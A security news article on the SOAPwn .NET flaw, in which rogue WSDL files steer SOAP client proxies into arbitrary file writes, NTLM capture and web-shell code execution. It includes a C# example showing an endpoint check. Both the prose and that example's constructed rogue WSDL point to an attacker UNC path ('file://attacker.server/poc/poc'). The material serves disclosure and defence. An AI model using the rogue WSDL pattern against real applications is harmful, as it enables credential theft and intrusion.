.NET SOAPwn Flaw Opens Door for File Writes and Remote Code Execution via Rogue WSDL


New research has uncovered exploitation primitives within the .NET Framework that could be leveraged against enterprise-grade applications to achieve remote code execution.

watchTowr Labs, which has codenamed the vulnerability SOAPwn, said the issue affects Barracuda Service Center RMM, Ivanti Endpoint Manager (EPM), and Umbraco 8. But the list of affected vendors is likely to be longer given the widespread use of .NET.

The findings were presented today by watchTowr security researcher Piotr Bazydlo at the Black Hat Europe security conference, which is being held in London.

SOAPwn essentially allows attackers to abuse Web Services Description Language (WSDL) imports and HTTP client proxies to execute arbitrary code in products built on .NET, owing to the way those products handle Simple Object Access Protocol (SOAP) client endpoints.

"It's usually abusable through SOAP clients, especially if they are dynamically created from the attacker-controlled WSDL," Bazydlo said.

As a result, .NET Framework HTTP client proxies can be manipulated into using file system handlers and achieving an arbitrary file write: passing a URL such as "file://" into a SOAP client proxy causes the serialized SOAP request to be written to that path rather than sent over HTTP, which can ultimately lead to code execution. To make matters worse, it can be used to overwrite existing files, because the attacker controls the full write path.

In a hypothetical attack scenario, a threat actor could leverage this behavior to supply a Universal Naming Convention (UNC) path (e.g., "file://attacker.server/poc/poc") and cause the SOAP request to be written to an SMB share under their control. This, in turn, can allow an attacker to capture the NTLM challenge-response and attempt to crack it offline, provided the victim host can reach the attacker's share over SMB.

That's not all. The research also found that a more powerful exploitation vector can be weaponized in applications that generate HTTP client proxies from WSDL files using the ServiceDescriptionImporter class, by taking advantage of the fact that it does not validate the endpoint URL used by the generated HTTP client proxy.


In this manner, an attacker can supply a vulnerable application with a URL that points to a WSDL file they control, and obtain remote code execution by dropping a fully functional ASPX web shell or additional payloads such as CSHTML web shells or PowerShell scripts.
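The two flows described above, the unvalidated ServiceDescriptionImporter path and the guard a consuming application is expected to add, as an added example written for this page (not code from the article or from watchTowr). It targets .NET Framework (System.Web.Services.dll); the WSDL embedded in it is constructed for the example, and the host, service and operation names in it are made up.

```csharp
// Added example, not code from the article or from watchTowr: refuse a WSDL
// whose <soap:address> points anywhere other than http(s), shown next to the
// unvalidated ServiceDescriptionImporter flow. Targets .NET Framework
// (System.Web.Services.dll). The WSDL below is constructed for this example.
using System;
using System.CodeDom;
using System.Collections.Generic;
using System.IO;
using System.Web.Services.Description;

static class WsdlEndpointCheck
{
    // A generated proxy hands its Url to WebRequest.Create(). For a file:// or
    // UNC location that yields a FileWebRequest, so Invoke() writes the SOAP
    // envelope to disk (or to an SMB share) instead of sending it.
    // Accept only absolute http or https endpoints.
    public static bool IsAcceptableEndpoint(string location)
    {
        Uri uri;
        if (!Uri.TryCreate(location, UriKind.Absolute, out uri))
            return false;                       // relative or unparsable
        if (uri.IsFile || uri.IsUnc)
            return false;                       // file://..., \\server\share
        return uri.Scheme == Uri.UriSchemeHttp || uri.Scheme == Uri.UriSchemeHttps;
    }

    // Collects every port address in the WSDL that fails the check.
    // Soap12AddressBinding derives from SoapAddressBinding, so one Find()
    // covers both SOAP 1.1 and SOAP 1.2 ports.
    public static List<string> RejectedLocations(ServiceDescription sd)
    {
        var rejected = new List<string>();
        foreach (Service service in sd.Services)
            foreach (Port port in service.Ports)
            {
                var addr = port.Extensions.Find(typeof(SoapAddressBinding)) as SoapAddressBinding;
                if (addr != null && !IsAcceptableEndpoint(addr.Location))
                    rejected.Add(addr.Location);
            }
        return rejected;
    }

    // Constructed rogue WSDL: one port at an attacker UNC path, one at a
    // normal HTTPS endpoint (hypothetical names).
    const string RogueWsdl = @"<definitions xmlns=""http://schemas.xmlsoap.org/wsdl/""
    xmlns:soap=""http://schemas.xmlsoap.org/wsdl/soap/""
    xmlns:tns=""urn:example"" targetNamespace=""urn:example"">
  <message name=""PingIn""/>
  <portType name=""PingPort"">
    <operation name=""Ping""><input message=""tns:PingIn""/></operation>
  </portType>
  <binding name=""PingBinding"" type=""tns:PingPort"">
    <soap:binding transport=""http://schemas.xmlsoap.org/soap/http""/>
    <operation name=""Ping"">
      <soap:operation soapAction=""urn:example#Ping""/>
      <input><soap:body use=""literal""/></input>
    </operation>
  </binding>
  <service name=""PingService"">
    <port name=""Rogue"" binding=""tns:PingBinding"">
      <soap:address location=""file://attacker.server/poc/poc""/>
    </port>
    <port name=""Normal"" binding=""tns:PingBinding"">
      <soap:address location=""https://api.example.com/ping""/>
    </port>
  </service>
</definitions>";

    static void Main()
    {
        ServiceDescription sd = ServiceDescription.Read(new StringReader(RogueWsdl));

        // Unvalidated path (what an affected application does): the importer
        // copies each port's Location verbatim into the generated proxy's
        // constructor (this.Url = "...") without looking at its scheme.
        var importer = new ServiceDescriptionImporter();
        importer.ProtocolName = "Soap";
        importer.Style = ServiceDescriptionImportStyle.Client;
        importer.AddServiceDescription(sd, null, null);
        var ns = new CodeNamespace("Generated");
        var unit = new CodeCompileUnit();
        unit.Namespaces.Add(ns);
        ServiceDescriptionImportWarnings warnings = importer.Import(ns, unit);
        Console.WriteLine("import completed, warnings: " + warnings);

        // Hardened path: inspect the addresses first and refuse the document
        // if any port would send the proxy somewhere other than http(s).
        List<string> bad = RejectedLocations(sd);
        if (bad.Count > 0)
            Console.WriteLine("refusing WSDL, unacceptable endpoints: " + string.Join(", ", bad));
        else
            Console.WriteLine("all endpoints acceptable");
    }
}
```

The check must run before the proxy is instantiated, because nothing downstream (neither the importer nor the proxy's Url setter) rejects the scheme. Applications that let a user set the endpoint URL directly on an existing proxy need the same IsAcceptableEndpoint guard on that input; egress filtering of outbound SMB (TCP 445) limits the UNC variant but does nothing against a local file:// path on the application server itself.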

Following responsible disclosure in March 2024 and July 2025, Microsoft has opted not to fix the vulnerability, stating that the issue stems from either an application issue or expected behavior, and that "users should not consume untrusted input that can generate and run code."

The findings illustrate how expected behavior in a popular framework can become a potential exploit path that leads to NTLM relaying or arbitrary file writes. The issue has since been addressed in Barracuda Service Center RMM version 2025.1.1 (CVE-2025-34392, CVSS score: 9.8) and Ivanti EPM version 2024 SU4 SR1 (CVE-2025-13659, CVSS score: 8.8). The vulnerability in Umbraco 8 persists, as that version reached end-of-life (EoL) on February 24, 2025.

"It's possible to make SOAP proxies write SOAP requests into files rather than sending them over HTTP," Bazydlo said. "In many cases, this leads to remote code execution through webshell uploads or PowerShell script uploads. The exact impact depends on the application using the proxy classes."
